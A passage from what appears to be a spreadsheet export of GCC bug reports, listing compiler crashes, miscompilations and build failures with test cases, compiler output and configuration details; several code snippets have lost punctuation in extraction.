  Error: Cannot pass scalar to array argument 'i' at (1)
  Error: Scalar supplied for array argument I (no. 1) of SUB
  Illegal association of a scalar actual argument with array dummy argument I.
  error #7836: If the actual argument is scalar the corresponding dummy argument shall be scalar unless the actual argument is an element of an array that is not an assumed-shape or pointer array or a substring of such an element.   [I]
Though I'm not sure whether one needs to be as long as ifort.
Cool stuff: If one changes the contains into end and removes the last line gfortran -fwhole-file still detects the violated constraint while ifort g95 openf95 miss it. NAG f95 also detects it.
implicit none
 integer :: i(45)j
 i = 0
 call sub(i)
 call sub(j)  ! Wrong scalar passed to array
 print '(5i0)' i
contains
 subroutine sub(i)
   integer :: i(*)
   i(1) = 2
 end subroutine sub
end</t>
  </si>
  <si>
    <t>GCC-19749</t>
  </si>
  <si>
    <t>Coldfire ICE at -O2 or higher</t>
  </si>
  <si>
    <t>The attach file passes with -O1 and lower but fails at this level. The code is
part of RTEMS.
$ m68k-rtems-gcc -m5200 -O2 -c ata.i
ata.i: In function 'ata_initialize':
ata.i:190: error: insn does not satisfy its constraints:
(insn 353 198 200 13 (set (reg:QI 8 %a0)
        (mem:QI (plus:SI (reg/f:SI 14 %a6)
                (const_int -71 [0xffffffb9])) [29 D.1229+0 S1 A8])) 34
{*m68k.md:752} (nil)
    (nil))
ata.i:190: internal compiler error: in reload_cse_simplify_operands at
postreload.c:391
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Compiler version is:
$ m68k-rtems-gcc -v
Using built-in specs.
Configured with: ../cvs/head/configure --target=m68k-rtems
--prefix=/local/tools/head --with-gnu-as --with-gnu-ld --with-newlib
--disable-nls --with-system-zlib --enable-version-specific-runtime-libs
--enable-languages=cc++ --enable-threads=rtems
Thread model: rtems
gcc version 4.0.0 20050131 (experimental)</t>
  </si>
  <si>
    <t>GCC-68276</t>
  </si>
  <si>
    <t>ios_base::_M_grow_words should use new (std::nothrow)</t>
  </si>
  <si>
    <t>To avoid aborting on allocation failure when the library is compiled with -fno-exceptions _M_grow_words should use nothrow new and check for null instead of catching std::bad_alloc.</t>
  </si>
  <si>
    <t>GCC-26588</t>
  </si>
  <si>
    <t>gfortran -fopenmp passes unrecognised -pthread</t>
  </si>
  <si>
    <t>On cygwin gfortran -fopenmp gives the warning
  gfortran: unrecognized option '-pthread'
which gives a heap of failures in the testsuite.
This is set in gcc.c:
/* Adding -fopenmp should imply pthreads.  This is particularly important
   for targets that use different start files and suchlike.  */
#ifndef GOMP_SELF_SPECS
#define GOMP_SELF_SPECS %{fopenmp: -pthread}
#endif
I think the fix is to override it as is done in gcc/config/darwin.h
/* Every program on darwin links against libSystem which contains the pthread
   routines so there's no need to explicitly call out when doing threaded
   work.  */
#undef GOMP_SELF_SPECS
#define GOMP_SELF_SPECS 
I'll prepare a patch at some stage.</t>
  </si>
  <si>
    <t>GCC-36951</t>
  </si>
  <si>
    <t>uninitialized-variable warning misnames program objects after inlining</t>
  </si>
  <si>
    <t xml:space="preserve">
Compiling the attached piece of code produces this:
  foo.c: In function 'bar':
  foo.c:8: warning: 'bar_thing.member' is used uninitialized in this function
but line 8 is in foo() not bar and bar_thing isn't in scope.
It has inlined foo (confirmed in the assembler output) and it's
reporting about the inlined assignment but it's doing so in a... less
than desirable way.
When I hit this on real source the inlined function and the call site
were 1000 lines apart and the reported name of the variable at the
call site (equivalent to bar_thing) was not illuminating so I had
to get most of the way through preparing the minimal bug report before
I realized what was going on.
I've seen this on several configurations of gcc 4.1.2 (and also the
pre-4.1.3 snap NetBSD is currently using) but I don't have any newer
gccs than that on hand.
If you don't care because nobody cares about 4.1 any more and it
doesn't repeat on newer gccs oh well.
Environment:
System: NetBSD tanaqui 4.99.54 NetBSD 4.99.54 (TANAQUI) #21: Fri Feb 29 12:31:31 EST 2008 dholland@tanaqui:/usr/src/sys/arch/i386/compile/TANAQUI i386
host: i386-unknown-netbsdelf4.99.19
build: i386-unknown-netbsdelf4.99.19
target: mips-unknown-linux-gnu
configured with: /home/dholland/projects/os161/toolchain/work2007/test-gcc/./gcc-4.1.2+cs161/configure --target=mips-linux --nfp --disable-shared --disable-threads --disable-libmudflap --disable-libssp --prefix=/home/dholland/cs161/tools
How-To-Repeat:
gcc -Wall -O -c foo.i
foo.i:
   ------------
# 1 foo.c
# 1 
# 1 
# 1 foo.c
struct thing {
   int member
}
struct thing *external
static void foo(struct thing foo_thing) {
   *external = foo_thing
}
void bar(void) {
   struct thing bar_thing
   foo(bar_thing)
}
   ------------</t>
  </si>
  <si>
    <t>dholland</t>
  </si>
  <si>
    <t>GCC-13197</t>
  </si>
  <si>
    <t>Infinite loop in build</t>
  </si>
  <si>
    <t>Created a build dir using
../gcc-3.3-20031124/configure --verbose --target=sh-elf --prefix=/gcc-3.3.3-sh-
elf --enable-haifa --enable-languages=cc++
Note: The prefix directory is empty
'make' aborted in gcc dir complaining about fixinc. Disabled
the fixinc and fixprot lines in gcc/Makefile
Restarted make.
Now an endless loop occures. Looking at gcc/Makefile there is
gtyp-gen.h: Makefile
...
	$(SHELL) $(srcdir)/move-if-change tmp-gtyp.h gtyp-gen.h 
Since Makefile was changed after creation of gtyp-gen.h but
rebuild tmp-gtyp.h is identical to gtyp-gen.h the rule obove
will always trigger.
Manuel touch on gtyp-gen.h the build continued</t>
  </si>
  <si>
    <t>hartmut.schirmer</t>
  </si>
  <si>
    <t>GCC-59723</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: in lto_output_tree at lto-streamer-out.c:1390 when compiling some Fortran tests with -flto</t>
  </si>
  <si>
    <t>When compiling some Fortran tests with -flto one gets the following ICE:
[Book15] f90/bug% /opt/gcc/gcc4.9a-205798/bin/gfortran -flto /opt/gcc/work/gcc/testsuite/gfortran.dg/namelist_64.f90
/opt/gcc/work/gcc/testsuite/gfortran.dg/namelist_64.f90: In function 'MAIN__':
/opt/gcc/work/gcc/testsuite/gfortran.dg/namelist_64.f90:27:0: internal compiler error: in lto_output_tree at lto-streamer-out.c:1390
 end program
 ^
/opt/gcc/work/gcc/testsuite/gfortran.dg/namelist_64.f90:27:0: internal compiler error: Abort trap: 6
gfortran: internal compiler error: Abort trap: 6 (program f951)
Abort
r205305 (2013-11-23) compiles the tests r205798 (2013-12-09) gives the ICE.</t>
  </si>
  <si>
    <t>GCC-69087</t>
  </si>
  <si>
    <t>e500v2 cross compiler skips assignment of double local variable in large stack frame</t>
  </si>
  <si>
    <t>Created attachment 37192
Preprocessed file
When compiled for a e500v2 target the following program works as expected with values of N in the ranges 1..4095 and 8192..8223. For values of N 4096..8191 or greater than 8224 the output is either 0 or a random/uninitialised value. I suspected that the issue was due to a stack overflow however when inspecting the generated assembly code for values of N 4096..8191 the assembly code corresponding to the line array[N-1] = N is omitted.
test.c
-----
#include 
int main(int argc char *argv[])
{
	double array[N]
	array[N-1] = N
	printf(array[%d] = %f\n N-1 array[N-1])
	return 1
}
-----
Compiler details and building on the host:
$ /opt/Denx/eldk/usr/bin/ppc_85xxDP-gcc -v -save-temps -DN=4096 test.c
Reading specs from /opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/specs
Target: powerpc-linux
Configured with: /opt/eldk/build/ppc-2008-04-01/work/usr/src/denx/BUILD/crosstool-0.43/build/gcc-4.2.2-glibc-20070515T2025-eldk/powerpc-linux/gcc-4.2.2/configure --target=powerpc-linux --host=i686-host_pc-linux-gnu --prefix=/var/tmp/eldk.UZpAG7/usr/crosstool/gcc-4.2.2-glibc-20070515T2025-eldk/powerpc-linux --disable-hosted-libstdcxx --with-headers=/var/tmp/eldk.UZpAG7/usr/crosstool/gcc-4.2.2-glibc-20070515T2025-eldk/powerpc-linux/powerpc-linux/include --with-local-prefix=/var/tmp/eldk.UZpAG7/usr/crosstool/gcc-4.2.2-glibc-20070515T2025-eldk/powerpc-linux/powerpc-linux --disable-nls --enable-threads=posix --enable-symvers=gnu --enable-__cxa_atexit --enable-languages=cc++java --enable-shared --enable-c99 --enable-long-long --without-x
Thread model: posix
gcc version 4.2.2
 /opt/Denx/eldk/usr/bin/../libexec/gcc/powerpc-linux/4.2.2/cc1 -E -quiet -v -imultilib m8540 -iprefix /opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/ -D__unix__ -D__gnu_linux__ -D__linux__ -Dunix -D__unix -Dlinux -D__linux -Asystem=linux -Asystem=unix -Asystem=posix -DN=4096 test.c -mcpu=8540 -mfloat-gprs=double -mspe=yes -mabi=spe -fpch-preprocess -o test.i
ignoring nonexistent directory /opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/../../../../powerpc-linux/sys-include
ignoring nonexistent directory /opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/../../../../powerpc-linux/include
ignoring nonexistent directory /var/tmp/eldk.UZpAG7/usr/crosstool/gcc-4.2.2-glibc-20070515T2025-eldk/powerpc-linux/lib/gcc/powerpc-linux/4.2.2/include
ignoring nonexistent directory /var/tmp/eldk.UZpAG7/usr/crosstool/gcc-4.2.2-glibc-20070515T2025-eldk/powerpc-linux/powerpc-linux/sys-include
ignoring nonexistent directory /var/tmp/eldk.UZpAG7/usr/crosstool/gcc-4.2.2-glibc-20070515T2025-eldk/powerpc-linux/powerpc-linux/include
ignoring duplicate directory /opt/Denx/eldk/usr/lib/gcc/powerpc-linux/4.2.2/include
ignoring nonexistent directory /opt/Denx/eldk/usr/lib/gcc/powerpc-linux/4.2.2/../../../../powerpc-linux/sys-include
ignoring nonexistent directory /opt/Denx/eldk/usr/lib/gcc/powerpc-linux/4.2.2/../../../../powerpc-linux/include
#include ... search starts here:
#include  search starts here:
 /opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/include
 /opt/Denx/eldk/usr/../ppc_85xxDP/usr/include
End of search list.
 /opt/Denx/eldk/usr/bin/../libexec/gcc/powerpc-linux/4.2.2/cc1 -fpreprocessed test.i -quiet -dumpbase test.c -mcpu=8540 -mfloat-gprs=double -mspe=yes -mabi=spe -auxbase test -version -o test.s
GNU C version 4.2.2 (powerpc-linux)
	compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.3 2.96-113).
GGC heuristics: --param ggc-min-expand=98 --param ggc-min-heapsize=128253
Compiler executable checksum: 1aec0482efbebeb41ccfcf839ce71331
 /opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/../../../../powerpc-linux/bin/as -me500 -mspe -V -Qy -o test.o test.s
GNU assembler version 2.17.50.0.12 (powerpc-linux) using BFD version 2.17.50.0.12 20070128
 /opt/Denx/eldk/usr/bin/../libexec/gcc/powerpc-linux/4.2.2/collect2 --eh-frame-hdr -V -Qy -m elf32ppclinux --hash-style=gnu -dynamic-linker /lib/ld.so.1 /opt/Denx/eldk/usr/../ppc_85xxDP/usr/lib/crt1.o /opt/Denx/eldk/usr/../ppc_85xxDP/usr/lib/crti.o /opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/m8540/crtbegin.o -L/opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/m8540 -L/opt/Denx/eldk/usr/lib/gcc/powerpc-linux/4.2.2/m8540 -L/opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2 -L/opt/Denx/eldk/usr/bin/../lib/gcc -L/opt/Denx/eldk/usr/lib/gcc/powerpc-linux/4.2.2 -L/opt/Denx/eldk/usr/../ppc_85xxDP/lib -L/opt/Denx/eldk/usr/../ppc_85xxDP/usr/lib test.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/m8540/crtsavres.o /opt/Denx/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/m8540/crtend.o /opt/Denx/eldk/usr/../ppc_85xxDP/usr/lib/crtn.o
GNU ld version 2.17.50.0.12 20070128
  Supported emulations:
   elf32ppclinux
   elf32ppc
   elf32ppcsim
$
Running on the target:
#./a.out 
array[4095] = -0.208637
#
The block of assembly that gets omitted is of the form:
-----
   6:test.c        **** 	array[N-1] = N
  40              		.loc 1 6 0
  41 0034 3D200000 		lis 9.LC0@ha
  42 0038 39290010 		la 9.LC0@l(9)
  43 003c 10090301 		evldd 00(9)
  44 0040 39207FF8 		li 932760
  45 0044 101F4B20 		evstddx 0319
-----
I haven't yet run the test with a later version of the cross compiler as configuring the tool chain is non-trivial and it may not be possible to upgrade for this particular product. But I will give it a go anyway.</t>
  </si>
  <si>
    <t>mavik</t>
  </si>
  <si>
    <t>GCC-47719</t>
  </si>
  <si>
    <t>[4.6 regression] ICE compiling libavcodec/adxdec.c (FFmpeg) for ARM</t>
  </si>
  <si>
    <t>Created attachment 23326
Preprocessed source
Using unpatched gcc from SVN built with portage (USE=vanilla):
$ arm-unknown-linux-gnueabi-gcc-4.6.0 --version
arm-unknown-linux-gnueabi-gcc-4.6.0 (Gentoo SVN) 4.6.0-pre9999 20110213 (experimental) rev. 170108
$ arm-unknown-linux-gnueabi-gcc-4.6.0 -I. -I/home/mru/src/ffmpeg.dev -D_ISOC99_SOURCE -D_POSIX_C_SOURCE=200112 -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -DHAVE_AV_CONFIG_H -mfloat-abi=softfp -mfpu=neon -mcpu=cortex-a8 -std=c99 -fomit-frame-pointer -marm -pthread -g -Wdeclaration-after-statement -Wall -Wno-parentheses -Wno-switch -Wdisabled-optimization -Wpointer-arith -Wredundant-decls -Wno-pointer-sign -Wcast-qual -Wwrite-strings -Wtype-limits -Wundef -Wmissing-prototypes -O3 -fno-math-errno -fno-signed-zeros -fno-tree-vectorize -Werror=implicit-function-declaration -Werror=missing-prototypes          -MMD -MF libavcodec/adxdec.d -MT libavcodec/adxdec.o -c -o libavcodec/adxdec.o /home/mru/src/ffmpeg.dev/libavcodec/adxdec.c
/home/mru/src/ffmpeg.dev/libavcodec/adxdec.c: In function 'adx_decode_frame':
/home/mru/src/ffmpeg.dev/libavcodec/adxdec.c:167:1: internal compiler error: in push_minipool_fix at config/arm/arm.c:12084
Please submit a full bug report
with preprocessed source if appropriate.
Preprocessed source attached.
Compilation succeeds if -fno-inline-functions is added to the flags.</t>
  </si>
  <si>
    <t>GCC-22458</t>
  </si>
  <si>
    <t>[3.4 regression] ICE on missing brace</t>
  </si>
  <si>
    <t>On the 3.4 branch I get a segfault for the following invalid code snippet:
=============================
void foo()
{
     __PRETTY_FUNCTION__
=============================
bug.c: In function `foo':
bug.c:3: error: parse error at end of input
bug.c:3: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
Mainline and 4.0 barnch are not affected.</t>
  </si>
  <si>
    <t>GCC-18809</t>
  </si>
  <si>
    <t>ICE after a couple of errors with a simple invalid C code</t>
  </si>
  <si>
    <t>I tried to compile rs6000.c outside of the gcc objdir just for checking on a flag but I found we produced 
an ICE after some errors.
Reduced to:
static int b (enum a mode) {}
static void c (void) { b (2) }
new.c:1: warning: 'enum a' declared inside parameter list
new.c:1: warning: its scope is only this definition or declaration which is probably not what you want
new.c:1: error: parameter 1 ('mode') has incomplete type
new.c: In function 'c':
new.c:2: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in 
convert_arguments at c-typeck.c:2170
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This looks not to be a regression but I could be wrong.</t>
  </si>
  <si>
    <t>GCC-71709</t>
  </si>
  <si>
    <t>[6 Regression] powerpc64le: argument to strcpy() optimised out</t>
  </si>
  <si>
    <t>The following test case fails on ppc64le:
#include 
char boot_command_line[2048]
char *saved_command_line
static char *static_command_line
static char *initcall_command_line
void *memblock_virt_alloc(int int)
void setup_command_line(char *command_line)
{
        saved_command_line =
                memblock_virt_alloc(strlen(boot_command_line) + 1 0)
        initcall_command_line =
                memblock_virt_alloc(strlen(boot_command_line) + 1 0)
        static_command_line = memblock_virt_alloc(strlen(command_line) + 1 0)
        strcpy(saved_command_line boot_command_line)
        strcpy(static_command_line command_line)
}
When built with:
# gcc -fno-common -mcmodel=medium -O2
The last strcpy() call has lost its first argument:
        bl memblock_virt_alloc
        nop
        addis 32.LANCHOR0+2048@toc@ha         # gpr load fusion type long
        ld 3.LANCHOR0+2048@toc@l(3)
        mr 431
        bl strcpy
        nop
        mr 430
        bl strcpy</t>
  </si>
  <si>
    <t>GCC-42775</t>
  </si>
  <si>
    <t>[4.4 regression] GCC fails to rebuild itself with STAGE1_CFLAGS=-O1</t>
  </si>
  <si>
    <t>../gcc-4.4.2/configure --enable-languages=c --disable-werror --enable-__cxa_atexit --disable-nls --enable-threads=posix --disable-multilib --prefix=/opt/cfarm/release/4.4.2 --with-cpu=v8
make bootstrap &amp;&amp; make install
PATH=/opt/cfarm/release/4.4.2/bin:$PATH
../gcc-4.4.2/configure --enable-languages=c --disable-werror --enable-__cxa_atexit --disable-nls --enable-threads=posix --disable-multilib --prefix=/opt/cfarm/release/4.4.2-v2 --with-cpu=v8
make bootstrap STAGE1_CFLAGS=-O1
fails with
/home/guerby/build442/./gcc/xgcc -B/home/guerby/build442/./gcc/ -B/opt/cfarm/release/4.4.2-v3/sparc64-unknown-linux-gnu/bin/ -B/opt/cfarm/release/4.4.2-v3/sparc64-unknown-linux-gnu/lib/ -isystem /opt/cfarm/release/4.4.2-v3/sparc64-unknown-linux-gnu/include -isystem /opt/cfarm/release/4.4.2-v3/sparc64-unknown-linux-gnu/sys-include -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wcast-qual -Wold-style-definition  -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I../../../gcc-4.4.2/libgcc -I../../../gcc-4.4.2/libgcc/. -I../../../gcc-4.4.2/libgcc/../gcc -I../../../gcc-4.4.2/libgcc/../include  -DHAVE_CC_TLS -o _popcountsi2.o -MT _popcountsi2.o -MD -MP -MF _popcountsi2.dep -DL_popcountsi2 -c ../../../gcc-4.4.2/libgcc/../gcc/libgcc2.c \
	  -fvisibility=hidden -DHIDE_EXPORTS
../../../gcc-4.4.2/libgcc/../gcc/libgcc2.c: In function '__popcountsi2':
../../../gcc-4.4.2/libgcc/../gcc/libgcc2.c:787: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [_popcountsi2.o] Error 1
make[3]: Leaving directory `/home/guerby/build442/sparc64-unknown-linux-gnu/libgcc'
make[2]: *** [all-stage1-target-libgcc] Error 2
make[2]: Leaving directory `/home/guerby/build442'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/home/guerby/build442'
make: *** [bootstrap] Error 2
Without STAGE1_CFLAGS=-O1 bootstrap works.
Note: this is gentoo bug https://bugs.gentoo.org/show_bug.cgi?id=283041</t>
  </si>
  <si>
    <t>GCC-53305</t>
  </si>
  <si>
    <t>internal crash with variadic templates and decltype</t>
  </si>
  <si>
    <t>Created attachment 27362
simplified c++ code that crushes gcc
g++ -std=c++0x gcc_bug.cpp -o t
gcc_bug.cpp: In member function â€˜int funct::operator()(argTs ...)â€™:
gcc_bug.cpp:7:2: error: expected â€˜â€™ before â€˜}â€™ token
gcc_bug.cpp:23: confused by earlier errors bailing out
in the real (and more complex) code instead the last error message was :
internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>chesstr</t>
  </si>
  <si>
    <t>GCC-55220</t>
  </si>
  <si>
    <t>[c++11] ICE when doing partial template specialization on variadic template</t>
  </si>
  <si>
    <t>GCC is reporting internal error when compiling the following well-formed (to my belief) code:
#include 
template  struct something_like_tuple 
{
}
template  struct is_last
{
	static const bool value = false
}
template  class Tuple typename ... Head&gt; 
struct is_last&gt;
{
	static const bool value = true
}
int main(int argc char* argv[])
{
	typedef something_like_tuple something_like_tuple_t
	std::cout ::value &lt;&lt; std::endl /* &lt;-- line 23 */
	std::cout ::value &lt;&lt; std::endl
}
g++ invoked as following:
g++ --std=c++11 test.cpp -o test
Output:
test.cpp: In function Ã¢int main(int char**)Ã¢:
test.cpp:23:53: internal compiler error: in unify at cp/pt.c:16952
Please submit a full bug report
with preprocessed source if appropriate.
g++ -v
Using built-in specs.
COLLECT_GCC=##I believe not relevant##
COLLECT_LTO_WRAPPER=##I believe not relevant##
Target: i686-pc-linux-gnu
Configured with: ./configure --prefix=##I believe not relevant## --enable-threads=posix --enable-shared --enable-checking=release --enable-languages=cc++ i686-pc-linux-gnu --with-mpc-include=##I believe not relevant## --with-mpc-lib=##I believe not relevant##
Thread model: posix
gcc version 4.7.1 (GCC)</t>
  </si>
  <si>
    <t>alex.irger</t>
  </si>
  <si>
    <t>GCC-30262</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] ICE with nested fn accessed var in asm m constraint</t>
  </si>
  <si>
    <t>void
foo (void)
{
  unsigned int x = 0
  void bar (void)
  {
    x = 254
  }
  bar ()
  asm volatile ( :: m (x))
}
ICEs in various places at -O and higher in both 4.1.1 and on the trunk.
From initial skim it seems tree-nested.c ought to be more careful when changing
asms.</t>
  </si>
  <si>
    <t>GCC-26545</t>
  </si>
  <si>
    <t>undeclared 64bit constants in c-common.c</t>
  </si>
  <si>
    <t>configured with threads=aix no nls and languages c c++ objc
gcc -c   -g -DENABLE_CHECKING -DENABLE_ASSERT_CHECKING -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes     -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.1.0/gcc -I../../gcc-4.1.0/gcc/. -I../../gcc-4.1.0/gcc/../include -I../../gcc-4.1.0/gcc/../libcpp/include     ../../gcc-4.1.0/gcc/c-common.c -o c-common.o
../../gcc-4.1.0/gcc/c-common.c: In function `c_common_nodes_and_builtins':
../../gcc-4.1.0/gcc/c-common.c:3167: `TARGET_64BIT' undeclared (first use in this function)
../../gcc-4.1.0/gcc/c-common.c:3167: (Each undeclared identifier is reported only once
../../gcc-4.1.0/gcc/c-common.c:3167: for each function it appears in.)
../../gcc-4.1.0/gcc/c-common.c: In function `c_stddef_cpp_builtins':
../../gcc-4.1.0/gcc/c-common.c:4036: `TARGET_64BIT' undeclared (first use in this function)
make[2]: *** [c-common.o] Error 1</t>
  </si>
  <si>
    <t>multix</t>
  </si>
  <si>
    <t>GCC-50702</t>
  </si>
  <si>
    <t>[4.7 Regression] 20020210-1.c:2:22: ICE: gimple_op at gimple.h:1704. at -O1 and above</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/
-O0  -w -c  -o 20020210-1.o /test/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/compil
e/20020210-1.c    (timeout = 300)
PASS: gcc.c-torture/compile/20020210-1.c  -O0  (test for excess errors)
Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/
-O1  -w -c  -o 20020210-1.o /test/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/compil
e/20020210-1.c    (timeout = 300)
/test/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/compile/20020210-1.c: In function
'f':
/test/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/compile/20020210-1.c:2:22: interna
l compiler error: in gimple_op at gimple.h:1704
-bash-3.2$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa64-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu64/bin/as --with-ld=/usr/ccs/bin/ld --enable-shared --with-local-prefix=/opt/gnu64 --prefix=/opt/gnu64/gcc/gcc-4.7 --build=hppa64-hp-hpux11.11 --enable-threads=posix --disable-nls --with-gmp=/opt/gnu64/gcc/gmp --with-libelf=/opt/gnu64 --enable-languages=cc++objcobj-c++fortran
Thread model: posix
gcc version 4.7.0 20111011 (experimental) [trunk revision 179831] (GCC)</t>
  </si>
  <si>
    <t>GCC-18416</t>
  </si>
  <si>
    <t>[4.0 regression] ICE in import_export_decl</t>
  </si>
  <si>
    <t>$ cat errarg.ii 
class errarg { 
  enum { EMPTY } type 
 public: 
  errarg() 
} 
extern errarg empty_errarg 
extern void errprint(const char * 
       const errarg &amp;arg1 = empty_errarg 
       const errarg &amp;arg2 = empty_errarg 
       const errarg  
errarg::errarg() : type(EMPTY) 
{ 
} 
errarg empty_errarg 
(gdb) r -fpreprocessed errarg.ii -O 
Starting program: /cvs/test/gcc/gcc/cc1plus -fpreprocessed errarg.ii -O 
 errarg::errarg() 
 errarg::errarg() 
 errarg::errarg() 
 void __static_initialization_and_destruction_0(int int) 
Program received signal SIGSEGV Segmentation fault. 
import_export_decl (decl=0x200000000049f9c0) at /cvs/gcc/gcc/cp/decl2.c:1773 
1773        gcc_assert (DECL_IMPLICIT_INSTANTIATION (decl) 
(gdb) p decl.decl.lang_specific 
$6 = (struct lang_decl *) 0x0</t>
  </si>
  <si>
    <t>GCC-79066</t>
  </si>
  <si>
    <t>[7 Regression] non-PIC code generated for powerpc glibc with -fpic</t>
  </si>
  <si>
    <t>Created attachment 40506
Preprocessed source
GCC configured thus for 32-bit powerpc hard-float produces non-PIC code when building glibc libm.
Target: powerpc-glibc-linux-gnu
Configured with: /scratch/jmyers/glibc/many7/src/gcc/configure --prefix=/scratch/jmyers/glibc/many7/install/compilers/powerpc-linux-gnu --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=powerpc-glibc-linux-gnu --with-sysroot=/scratch/jmyers/glibc/many7/install/compilers/powerpc-linux-gnu/sysroot --disable-multilib --enable-secureplt --disable-libsanitizer --disable-libssp --with-gmp=/scratch/jmyers/glibc/many7/install/host-libraries --with-mpfr=/scratch/jmyers/glibc/many7/install/host-libraries --with-mpc=/scratch/jmyers/glibc/many7/install/host-libraries --enable-languages=cc++ --enable-shared --enable-threads
Thread model: posix
gcc version 7.0.0 20170112 (experimental) [trunk revision 244346] (GCC) 
Compile with:
powerpc-glibc-linux-gnu-gcc -S -std=gnu11 -fgnu89-inline  -O2 -fmerge-all-constants -fno-stack-protector -frounding-math -fpic e_asin.i
The resulting code contains towards the end of __ieee754_asin (and again for __ieee754_acos):
        lis 9.LC44@ha
[...]
        la 9.LC44@l(9)
These are absolute non-PIC relocations and result in text relocations in libm.so.
This appeared with r242908 but presumably was latent before then.
Preprocessed source attached.</t>
  </si>
  <si>
    <t>GCC-21107</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] internal compiler error: in expand_one_stack_var_at at cfgexpand.c:476</t>
  </si>
  <si>
    <t>If Pmode is smaller than the HOST_BITS_PER_WIDE_INT (ie for i686 as host all
targets which use HImode or QImode as Pmode) a stack overflow produce the
following internal compiler error:
$./cc1 t4.c
 check1972
/homes/mkoegler/m68hc05/src/host-i686-pc-linux-gnu/gcc/test/t4.c: In function
'check1972':
/homes/mkoegler/m68hc05/src/host-i686-pc-linux-gnu/gcc/test/t4.c:7: internal
compiler error: in expand_one_stack_var_at at cfgexpand.c:476
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$cat t4.c
union S1972
{
  char b[24000]
}
void
check1972 ()
{
  union S1972 ret
  union S1972 b1
  union S1972 b2
}
$./cc1 --version
GNU C version 4.1.0 20050416 (experimental) (avr)
        compiled by GNU C version 4.1.0 20050302 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096</t>
  </si>
  <si>
    <t>e9925248</t>
  </si>
  <si>
    <t>GCC-69688</t>
  </si>
  <si>
    <t>[6 Regression] -Wsign-compare causes bogus error: size of array â€˜uc_codeâ€™ is not an integral constant-expression</t>
  </si>
  <si>
    <t>struct ScriptObjectFixture
{
    static const int code_size
    static const char code[]
    static wchar_t uc_code[]
    ScriptObjectFixture()
    {
        for (int i = 0 i &lt; code_size i++)
            uc_code[i] = 0
    }
}
const char ScriptObjectFixture::code[] = x
const int ScriptObjectFixture::code_size = sizeof(ScriptObjectFixture::code) - 1
wchar_t ScriptObjectFixture::uc_code[ScriptObjectFixture::code_size]
$ g++ w.cc -c  -Wsign-compare
w.cc:17:68: error: size of array â€˜uc_codeâ€™ is not an integral constant-expression
 wchar_t ScriptObjectFixture::uc_code[ScriptObjectFixture::code_size]
                                                                    ^
Without -Wsign-compare there's no diagnostic.
Caused by r230365</t>
  </si>
  <si>
    <t>GCC-79295</t>
  </si>
  <si>
    <t>[7 regression] gcc.target/powerpc/bcd-3.c fails starting with r244942</t>
  </si>
  <si>
    <t>Causes an ICE
spawn /home/seurer/gcc/build/gcc-test/gcc/xgcc -B/home/seurer/gcc/build/gcc-test/gcc/ /home/seurer/gcc/gcc-test/gcc/testsuite/gcc.target/powerpc/bcd-3.c -fno-diagnostics-show-caret -fdiagnostics-color=never -mcpu=power8 -O2 -ffat-lto-objects -S -o bcd-3.s
/home/seurer/gcc/gcc-test/gcc/testsuite/gcc.target/powerpc/bcd-3.c: In function 'do_add_lt':
/home/seurer/gcc/gcc-test/gcc/testsuite/gcc.target/powerpc/bcd-3.c:34:1: error: insn does not satisfy its constraints:
(insn 44 3 13 2 (parallel [
            (set (reg/v:V1TI 32 0 [orig:156  ] [156])
                (unspec:V1TI [
                        (reg/v:V1TI 77 0 [orig:157 a ] [157])
                        (reg/v:V1TI 78 1 [orig:158 b ] [158])
                        (const_int 0 [0])
                    ] UNSPEC_BCDADD))
            (set (reg:CCFP 74 6)
                (compare:CCFP (unspec:V2DF [
                            (reg/v:V1TI 77 0 [orig:157 a ] [157])
                            (reg/v:V1TI 78 1 [orig:158 b ] [158])
                            (const_int 0 [0])
